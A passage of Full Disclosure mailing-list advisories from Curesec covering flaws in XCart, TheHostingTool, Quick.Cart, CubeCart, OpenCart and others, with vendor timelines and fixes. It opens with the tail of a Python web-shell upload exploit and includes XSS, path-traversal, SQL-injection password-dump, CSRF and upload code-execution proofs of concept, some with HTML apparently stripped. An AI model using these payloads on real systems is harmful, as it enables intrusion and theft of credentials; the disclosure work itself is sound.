files = filesData, data = postData) return "The data has been saved successfully" in uploadResult.text def runShell(url): print("enter command, or enter exit to quit.") command = raw_input("$ ") while "exit" not in command: print(requests.get(url + command).text.replace("GIF89a;", "")) command = raw_input("$ ") requestSession = requests.session() if login(requestSession, url + loginPath, username, password): print("successful: login") else: exit("ERROR: Incorrect username or password") if upload(requestSession, url + fileManagerPath, shellFileName, shellContent): print("successful: file uploaded") else: exit("ERROR: could not upload file") runShell(url + shellFileName + "?x=") Blog Reference: http://blog.curesec.com/article/blog/XCart-526-Code-Execution-Exploit-87.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] XCart 5.2.6: Code Execution
Security Advisory - Curesec Research Team 1. Introduction Affected Product:XCart 5.2.6 Fixed in:5.2.7 Fixed Version Link: https://www.x-cart.com/xc5kit Vendor Contact: supp...@x-cart.com Vulnerability Type: Code Execution Remote Exploitable: Yes Reported to vendor: 08/13/2015 Disclosed to public: 11/04/2015 Release mode:Coordinated release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description When uploading a favicon (http://localhost/anew/xcart/admin.php?target= logo_favicon), there is no check as to what type or extension the file has. This allows an attacker that gained admin credentials to upload a PHP file and thus gain code execution. 3. Solution To mitigate this issue please upgrade at least to version 5.2.7: https://www.x-cart.com/xc5kit Please note that a newer version might already be available. 4. Report Timeline 08/13/2015 Informed Vendor about Issue 09/03/2015 Vendor Requests more time 10/19/2015 Vendor releases fix 11/04/2015 Disclosed to public Blog Reference: http://blog.curesec.com/article/blog/XCart-526-Code-Execution-86.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] XCart 5.2.6: Path Traversal
Security Advisory - Curesec Research Team 1. Introduction Affected Product:XCart 5.2.6 Fixed in:5.2.7 Fixed Version Link: https://www.x-cart.com/xc5kit Vendor Contact: supp...@x-cart.com Vulnerability Type: Path Traversal Remote Exploitable: Yes Reported to vendor: 08/13/2015 Disclosed to public: 11/04/2015 Release mode:Coordinated release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Arbitrary File Download Description When downloading a file, the input is not properly protected against directory traversal, which makes it possible to download arbitrary files. Please note that admin credentials are required. Proof of Concept http://localhost/anew/xcart/skins/admin/en/modules/CDev/TinyMCE/js/tinymce/plugins/filemanager/force_download.php POST: path=/////////////////..etc/passwd&name=download.txt Code /skins/admin/en/modules/CDev/TinyMCE/js/tinymce/plugins/filemanager/force_download.php:10 $path=joinPaths($root,$upload_dir,$_POST['path']); $path=str_replace(LC_DS . '..', '', $path); $name=$_POST['name']; header('Pragma: private'); header('Cache-control: private, must-revalidate'); header("Content-Type: application/octet-stream"); header("Content-Length: " .(string)(filesize($path)) ); header('Content-Disposition: attachment; filename="'.($name).'"'); readfile($path); 3. List Directories Description It is possible to list the directories contained by any directory due to a directory traversal vulnerability via the fldr POST argument. This may be used to gather information about the target system. Please note that admin credentials are required. Proof of Concept http://localhost/anew/xcart/skins/admin/en/modules/CDev/TinyMCE/js/tinymce/plugins/filemanager/dialog.php?type=0&editor=mce_0&popup=0&lang=en_EN&field_id=&fldr=../../../../../../ 4. Solution To mitigate this issue please upgrade at least to version 5.2.7: https://www.x-cart.com/xc5kit Please note that a newer version might already be available. 5. Report Timeline 08/13/2015 Informed Vendor about Issue 09/03/2015 Vendor Requests more time 10/19/2015 Vendor releases fix 11/04/2015 Disclosed to public Blog Reference: http://blog.curesec.com/article/blog/XCart-526-Path-Traversal-85.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] XCart 5.2.6: XSS
Security Advisory - Curesec Research Team 1. Introduction Affected Product:XCart 5.2.6 Fixed in:5.2.7 Fixed Version Link: https://www.x-cart.com/xc5kit Vendor Contact: supp...@x-cart.com Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 08/13/2015 Disclosed to public: 11/04/2015 Release mode:Coordinated release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description There are multiple XSS vulnerabilities in the dialog.php file. This allows an attacker to execute arbitrary JavaScript in the context of the browser of a victim if the victim clicks on an attacker supplied link or visits an attacker controlled website. With this, it is possible to bypass CSRF protection and thus do anything the victim can do, inject a JavaScript keylogger, or perform phishing attacks. 3. Proof of Concept http://localhost/anew/xcart/skins/admin/en/modules/CDev/TinyMCE/js/tinymce/plugins/filemanager/dialog.php?editor=";>alert(1)&lang=">alert(2)&field_id=">alert(3)&fldr=">alert(4)&type=">alert(5) 4. Solution To mitigate this issue please upgrade at least to version 5.2.7: https://www.x-cart.com/xc5kit Please note that a newer version might already be available. 5. Report Timeline 08/13/2015 Informed Vendor about Issue 09/03/2015 Vendor Requests more time 10/19/2015 Vendor releases fix 11/04/2015 Disclosed to public Blog Reference: http://blog.curesec.com/article/blog/XCart-526-XSS-84.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] SQLiteManager 1.2.4: Multiple XSS
SQLiteManager 1.2.4: Multiple XSS Security Advisory – Curesec Research Team 1. Introduction Affected Product: SQLiteManager 1.2.4 Fixed in: not fixed Fixed Version Link: n/a Vendor Contact: sqlitemana...@gmail.com Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 09/01/2015 Disclosed to public:10/07/2015 Release mode: Full Disclosure CVE:n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description There are multiple XSS vulnerabilities in SQLiteManager 1.2.4. With this, it is possible to steal cookies, bypass CSRF protection, or inject JavaScript keyloggers. 3. Proof of Concept http://localhost/SQLiteManager-1.2.4/main.php?dbsel=2&function=";>alert(1) http://localhost/SQLiteManager-1.2.4/main.php?dbsel=2&table=";>alert(1) http://localhost/SQLiteManager-1.2.4/main.php?dbsel=2&trigger=";>alert(1) http://localhost/SQLiteManager-1.2.4/main.php?dbsel=2&view=";>alert(1) http://localhost/SQLiteManager-1.2.4/main.php?dbsel=2&action=browseItem&DisplayQuery=alert(1) http://localhost/SQLiteManager-1.2.4/main.php?dbsel=1&table=t1&action=insertElement¤tPage=0'">alert(1) 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 09/01/2015 Informed Vendor about Issue (no reply) 09/22/2015 Reminded Vendor of disclosure date (no reply) 10/07/2015 Disclosed to public 6. Blog Reference: http://blog.curesec.com/article/blog/SQLiteManager-124-Multiple-XSS-67.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] TheHostingTool 1.2.6: Multiple XSS
Security Advisory - Curesec Research Team 1. Introduction Affected Product:TheHostingTool 1.2.6 Fixed in:not fixed Fixed Version Link: n/a Vendor Website: https://thehostingtool.com/ Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 09/07/2015 Disclosed to public: 10/07/2015 Release mode:Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Description There are two reflected and one persistent XSS in TheHostingTool 1.2.6. With this, it is possible to bypass CSRF protection, inject JavaScript keyloggers, or perform phishing attacks. 3. Details Reflected XSS 1 Proof of Concept: http://localhost/ecommerce/THTv1.2.6/includes/ajax.php?function=notice&message=alert(1)&status Code: includes/ajax.php function notice() { global $style; if(isset($_REQUEST['status']) and isset($_REQUEST['message'])) { if($_REQUEST['status'] == "good") { $status = true; } else { $status = false; } echo $style->notice($status, $_REQUEST['message']); } return true; } includes/class_style.php public function notice($good, $message) { if($good) { //Cool! Everything's OK. $color = "green"; } else { //Oh no! It's a bad message! $color = "red"; } $notice = ''; $notice .= $message; $notice .= ''; return $notice; } Reflected XSS 2 Proof of Concept: http://localhost//ecommerce/THTv1.2.6/admin/?page=invoices&pay&iid=";>alert(1) Code: invoices.php: class page { public function content(){ # Displays the page global $style, $db, $main, $invoice; if(isset($_GET['iid']) and isset($_GET['pay'])){ $invoice->set_paid($_GET['iid']); echo "Invoice #{$_GET['iid']} marked as paid. Undo this action"; } elseif(isset($_GET['iid']) and isset($_GET['unpay'])){ $invoice->set_unpaid($_GET['iid']); echo "Invoice {$_GET['iid']} marked as unpaid. Undo this action"; } Persistent XSS Proof of Concept: 1. Create a new order here: http://localhost/ecommerce/THTv1.2.6/order/ 2. When asked for a domain, enter: http://ex.alert(1).com 3. visit http://localhost/ecommerce/THTv1.2.6/admin/?page=logs or http:// localhost/ecommerce/THTv1.2.6/admin/?page=users&sub=search&do=USERID 4. Solution This issue has not been fixed 5. Report Timeline 09/07/2015 Informed Vendor about Issue (no reply) 09/22/2015 Reminded Vendor of disclosure date (no reply) 10/07/2015 Disclosed to public Blog Reference: http://blog.curesec.com/article/blog/TheHostingTool-126-Multiple-XSS-78.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] TheHostingTool 1.2.6: Multiple SQL Injection
Security Advisory - Curesec Research Team 1. Introduction Affected Product:TheHostingTool 1.2.6 Fixed in:not fixed Fixed Version Link: n/a Vendor Website: https://thehostingtool.com/ Vulnerability Type: SQL Injection Remote Exploitable: Yes Reported to vendor: 09/07/2015 Disclosed to public: 10/07/2015 Release mode:Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Description There are three SQL Injections in the admin area of TheHostingTool 1.2.6. The problem is that the defense against SQL Injection depends in part on the global GET and POST variables being sanitized using mysql_real_escape_string if accessed via postvar or getvar. This makes them relatively safe to use in a query if the parameter is surrounded by quotes. But for places where the parameter is not surrounded by quotes, this will not prevent SQL injection. Please note that admin credentials are required for all SQL injections shown here. 3. Details SQL Injection 1 The POST value "type" is used as the column name in a WHERE clause when using the ajax search. Encoding single quotes does not prevent SQL injection in this case. It should also be noted that letting the user choose the column of a LIKE query on a user table is not a good idea in general, as it will be easy to iterate passwords this way. Proof of Concept: POST http://localhost/ecommerce/THTv1.2.6/includes/ajax.php?function=search type=user` %3D 1 union all select 1,password,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from tht_users %23&value=test Code: includes/ajax.php public function search() { global $main, $db, $style; if($_SESSION['logged']) { //echo '
[FD] TheHostingTool 1.2.6: Code Execution
Security Advisory - Curesec Research Team 1. Introduction Affected Product:TheHostingTool 1.2.6 Fixed in:not fixed Fixed Version Link: n/a Vendor Website: https://thehostingtool.com/ Vulnerability Type: Code Execution Remote Exploitable: Yes Reported to vendor: 09/07/2015 Disclosed to public: 10/07/2015 Release mode:Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Description Themes can be uploaded via a zip file by an admin. The uploader checks the validity of each file with a blacklist. The blacklist misses at least two file types that will lead to code execution: Any file with the extension .pht - which will be executed by most default Apache configuration - and the .htaccess file - which, if parsed by the server, will allow code execution with files with arbitrary extension. It is recommended to use a whitelist instead of a blacklist. Please note that admin credentials are required to exploit this issue. 3. Code lof.php if(preg_match('/^.+\.((?:php[3-5]?)|(?:cgi)|(?:pl)|(?:phtml))$/i', basename($stat['name']), $regs2)) { $errors[] = strtoupper($regs2[1]) . ' is not a valid file type in a theme zip.'; $insecureZip = true; break; } 4. Solution This issue has not been fixed 5. Report Timeline 09/07/2015 Informed Vendor about Issue (no reply) 09/22/2015 Reminded Vendor of disclosure date (no reply) 10/07/2015 Disclosed to public Blog Reference: http://blog.curesec.com/article/blog/TheHostingTool-126-Code-Execution-75.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Quick.Cart 6.6: Multiple XSS
Security Advisory - Curesec Research Team 1. Introduction Affected Product:Quick.Cart 6.6 Fixed in:not fixed Fixed Version Link: n/a Vendor Contact: i...@opensolution.org Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 09/07/2015 Disclosed to public: 10/07/2015 Release mode:Coordinated release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Description Quick.Cart 6.6 is vulnerable to multiple reflected XSS attacks. With this, it is possible to inject JavaScript keylogger or perform phishing attacks. The vulnerabilities are all in the admin.php file. To add security through obscurity, Quick.Cart does suggest to rename this file, which would make it more difficult to exploit these vulnerabilities. The renaming is not mandatory. The vulnerabilities detailed below depend on the fact that the main entry points for users and admins contains a call to extract: index.php extract( $_GET ); admin.php extract( $_GET ); With this, it is possible to overwrite or set any variable. Because of this, it is not considered best-practice to pass user input to extract. The SESSION variable can not be set by an attacker, because session_start is called after extract, but variables such as SERVER or COOKIE and undefined variables can be set. This call also makes it possible to send POST requests via GET, making the exploitation of for example CSRF easier. It may have further negative effects as well. 3. Details XSS 1 Proof of Concept: http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?p=orders-list&iStatus=";>alert(1) http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?p=orders-list&iProducts=";>alert('xss') Code: templates/admin/orders.php XSS 2 Proof of Concept: http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?p=lang-translations&sLanguage=alert(1) Code: templates/admin/languages.php XSS 3 Proof of Concept: http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?_COOKIE[sLogin]="; autofocus onfocus="alert('xss') Code: common-admin.php $content = ' AddOnload( cursor ); '.$lang['Login'].':'.$lang['Password'].':'; XSS 4 Proof of Concept: http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?_SERVER[HTTP_HOST]=";>alert(1)&_SERVER[SCRIPT_FILENAME]=/var/www/ecommerce/Quick.Cart_v6.6/admin.php Please note that the SCRIPT_FILENAME must be set correctly, as it's used as the name of the session key and overwriting one SERVER value leads to the deletion of all other SERVER values. Code: core/libraries/trash.php $GLOBALS['lang']['Language'] .= 'http://opensolution.org/news,.html?sUrl='.$_SERVER['HTTP_HOST'].'" style="display:none;">'; 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 09/07/2015 Informed Vendor about Issue 10/01/2015 Reminded Vendor of release date 10/01/2015 Vendor does not plan on releasing a fix, because the optional rename of the admin file may mitigate this issue already 10/07/2015 Disclosed to public Blog Reference: http://blog.curesec.com/article/blog/QuickCart-66-Multiple-XSS-74.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Quick.Cart 6.6: CSRF
Security Advisory - Curesec Research Team 1. Introduction Affected Product:Quick.Cart 6.6 Fixed in:not fixed Fixed Version Link: n/a Vendor Contact: i...@opensolution.org Vulnerability Type: CSRF Remote Exploitable: Yes Reported to vendor: 09/07/2015 Disclosed to public: 10/07/2015 Release mode:Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Description None of the requests of Quick.Cart 6.6 are protected from CSRF. This means that an attacker can perform actions for a logged in user by getting them to visit a website with specifically crafted HTML and JavaScript while logged in. The interesting Forms are all in the admin.php file. To add security through obscurity, Quick.Cart does suggest to rename this file, which would make it more difficult to exploit these vulnerabilities. The renaming is not mandatory. The vulnerability can be exploited via GET or POST because of a call to extract: extract( $_GET ); 3. Proof of Concept Change Admin Password: http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?p=tools-config"; method="POST"> document.createElement('form').submit.call(document.getElementById('myform')); Or via GET: http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?p=tools-config&_POST[sOption]=save%20%26raquo%3B&_POST[login]=admin&_POST[pass]=123&_POST[submit]=Submit%20request 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 09/07/2015 Informed Vendor about Issue 10/01/2015 Reminded Vendor of release date 10/01/2015 Vendor does not plan on releasing a fix, because the optional rename of the admin file may mitigate this issue already 10/07/2015 Disclosed to public Blog Reference: http://blog.curesec.com/article/blog/QuickCart-66-CSRF-73.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CubeCart 6.0.7: XSS
Security Advisory - Curesec Research Team 1. Introduction Affected Product:CubeCart 6.0.7 Fixed in:6.0.8 Fixed Version Link: https://www.cubecart.com/thank-you/CubeCart-6.0.8.zip Vendor Contact: sa...@cubecart.com Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 09/07/2015 Disclosed to public: 10/07/2015 Release mode:Coordinated release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Reflected XSS Description The search echoes a keyword it retrieves via GET inside HTML tags. It removes HTML tags from the keyword, but it does not encode quotes, which makes it possible to break out of the context of the current attribute and add new attributes. An attacker can use attributes such as onmouseover to execute JavaScript. To execute the code, the victim needs to hover over the title image, which an attacker may for example achieve via ClickJacking. Proof of Concept http://localhost/ecommerce/CubeCart-6.0.6/search.html?search[keywords]="; onmouseover="alert('xsstest')" foo="&_a=category 3. Persistent XSS Description The page to edit user-submitted reviews echoes user input inside HTML input tags without encoding quotes, which makes it possible to break out of the context of the current attribute and add new attributes. An attacker can use attributes such as onfocus to execute JavaScript. In combination with autofocus, a victim does not need to actually interact with the input field for the code to execute. Proof of Concept 1. Write a review here: http://localhost/ecommerce/CubeCart-6.0.6/ test-category/test-product.html#reviews_write 2. use as name or title: " autofocus onfocus="alert(1)" foo=" 3. Visit the review-edit site: http://localhost/ecommerce/CubeCart-6.0.6/ admin.php?_g=products&node=reviews&edit=REVIEWID 4. Solution To mitigate this issue please upgrade at least to version 6.0.8: https://www.cubecart.com/thank-you/CubeCart-6.0.8.zip Please note that a newer version might already be available. 5. Report Timeline 09/07/2015 Informed Vendor about Issue 10/05/2015 Vendor releases fix 10/07/2015 Disclosed to public Blog Reference: http://blog.curesec.com/article/blog/CubeCart-607-XSS-71.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CubeCart 6.0.7: Code Execution
Security Advisory - Curesec Research Team 1. Introduction Affected Product:CubeCart 6.0.7 Fixed in:6.0.8 Fixed Version Link: https://www.cubecart.com/thank-you/CubeCart-6.0.8.zip Vendor Contact: sa...@cubecart.com Vulnerability Type: Code Execution Remote Exploitable: Yes Reported to vendor: 09/07/2015 Disclosed to public: 10/07/2015 Release mode:Coordinated release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description When importing a language from a language file, it is only checked that the file contains valid XML, but the original extension of the file is kept, which makes it possible to gain code execution by uploading a file containing PHP code. Please note that admin credentials are required. 3. Proof of Concept Create a language file with valid XML and a file name like en.php with PHP code inside: My Language utf-8 1.0.0 5.0.0a 5.1.* GBP ltr Upload the file here: http://localhost/ecommerce/CubeCart-6.0.6/admin.php?_g= settings&node=language#lang_import And visit it to execute the code: http://localhost/ecommerce/CubeCart-6.0.6/ language/en.php?x=ls%20-alF 4. Solution To mitigate this issue please upgrade at least to version 6.0.8: https://www.cubecart.com/thank-you/CubeCart-6.0.8.zip Please note that a newer version might already be available. 5. Report Timeline 09/07/2015 Informed Vendor about Issue 10/05/2015 Vendor releases fix 10/07/2015 Disclosed to public Blog Reference: http://blog.curesec.com/article/blog/CubeCart-607-Code-Execution-70.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Supercali Event Calendar 1.0.8: XSS
Security Advisory - Curesec Research Team 1. Introduction Affected Product:Supercali Event Calendar 1.0.8 Fixed in:not fixed Fixed Version Link: n/a Vendor Website: http://supercali.inforest.com/ Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 09/01/2015 Disclosed to public: 10/07/2015 Release mode:Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description There is an XSS vulnerability via the "id" GET parameter when editing a group in Supercali Event Calendar 1.0.8. With this, it is possible to steal cookies or inject JavaScript keyloggers. 3. Proof of Concept http://supercali-1.0.8/supercali-1.0.8/edit_groups.php?mode=edit_group&id=alert('xss') 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 09/01/2015 Informed Vendor about Issue (no reply) 10/07/2015 Disclosed to public Blog Reference: http://blog.curesec.com/article/blog/Supercali-Event-Calendar-108-XSS-69.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Supercali Event Calendar 1.0.8: CSRF
Security Advisory - Curesec Research Team 1. Introduction Affected Product:Supercali Event Calendar 1.0.8 Fixed in:not fixed Fixed Version Link: n/a Vendor Website: http://supercali.inforest.com/ Vulnerability Type: CSRF Remote Exploitable: Yes Reported to vendor: 09/01/2015 Disclosed to public: 10/07/2015 Release mode:Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description None of the forms of Supercali Event Calendar 1.0.8 have CSRF protection, which means that an attacker can perform actions for the victim if the victim visits an attacker controlled site while logged in. 3. Proof of Concept Add a User: http://localhost/supercali-1.0.8/supercali-1.0.8/admin_actions.php"; method="POST"> document.myform.submit(); 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 09/01/2015 Informed Vendor about Issue (no reply) 10/07/2015 Disclosed to public Blog Reference: http://blog.curesec.com/article/blog/Supercali-Event-Calendar-108-CSRF-68.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] OpenCart 2.0.3.1: CSRF
Security Advisory - Curesec Research Team 1. Introduction Affected Product:OpenCart 2.0.3.1 Fixed in:not fixed Fixed Version Link: n/a Vendor Website: https://www.opencart.com/ Vulnerability Type: CSRF Remote Exploitable: Yes Reported to vendor: 09/01/2015 Disclosed to public: 10/07/2015 Release mode:Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description While CSRF protection exists for the actions of an admin, it does not exist for customers. This means that customer accounts can be compromised by an attacker if the victim visits an attacker controlled website while logged in. This issue was already discovered in 2013 by Saadat Ullah, but new versions of OpenCart are still vulnerable as no fix has been released. 3. Proof of Concept Change Password: http://localhost/opencart-2.0.3.1/upload/index.php?route=account/password"; > document.myform.submit(); Change profile information, including email address, which is used when logging in: http://localhost/opencart-2.0.3.1/upload/index.php?route=account/edit"; > document.myform.submit(); 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 09/01/ Informed Vendor about Issue (no reply) 2015 09/22/ Reminded Vendor of disclosure date 2015 09/23/ Vendor points out that issue is already known, and that they do not 2015 plan on releasing a fix 10/07/ Disclosed to public 2015 Blog Reference: http://blog.curesec.com/article/blog/OpenCart-2031-CSRF-66.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/